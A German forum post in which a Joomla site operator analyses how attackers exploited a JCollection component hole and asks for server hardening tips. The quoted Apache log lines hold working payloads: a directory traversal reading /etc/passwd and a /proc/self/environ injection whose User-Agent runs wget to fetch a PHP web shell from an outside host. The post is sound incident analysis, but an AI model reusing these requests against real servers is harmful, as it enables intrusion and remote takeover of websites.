Hallo Thorsten,
tcriess wrote:
PS es wäre noch hilfreich, einen Blick in die Apache-Logs zu werfen, um herauszufinden, wie der Angriff zustande kam (speziell, ob die erwähnte Lücke wirklich ausgenutzt wurde).
Die Lücke wurde bei uns definitiv gezielt ausgenutzt. Nicht einmal, sondern mehrmals von verschiedenen Angreifern. Ein Blick in das Logfile ist mehr als eindeutig:
"GET /index.php?option=com_jcollection&view=category&catid=2&all=0&Itemid=139 HTTP/1.1" 301 20 "
www.google.com.sa/search?hl=ar&safe=...rt=60&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"
Wie man sieht, hier wurde gezielt mit Hilfe von Google nach JCollection gesucht.
Dann folgt der nächste Schritt:
"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 200 4715 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)"
Und dann die Installation einer Shell über /proc/self/environ:
"GET /index.php?option=com_jcollection&controller=../../../../../../../proc/self/environ%00 HTTP/1.0" 200 1154 "-" "<?php system('wget
www.freewebtown.com/altbta/rxh.txt -O rxh.php'); ?>"
Der Schadcode (rxh.txt, als rxh.php abgespeichert) wird übrigens über den "Useragent" eingeschleust. Wie man sieht, benutzt der Angreifer Firefox und vermutlich das Addon TAMPER, mit dem das kinderleicht geht. Das Vorgehen des Angreifers entspricht 100% dem, was man im Netz zum grundsätzlichen Ausnutzen dieser Sicherheitslücken lesen kann. Da gibt es leider Schritt für Schritt Anleitungen, die es jedem Script-Kiddie ermöglichen. Den Rest erledigen Exploit-Meldungen und Google.
Wenn Du einen Tipp hast, wie unser Serverbetreiber das Ausnutzen einer solchen Lücke generell unterbinden kann, dann wäre ich sehr dankbar dafür. Ich habe von Linux und Serverkonfiguration leider keine Ahnung. Das ist auch der Grund, warum wir keinen eigenen Root betreiben, sondern einen managed VServer haben.
Forum
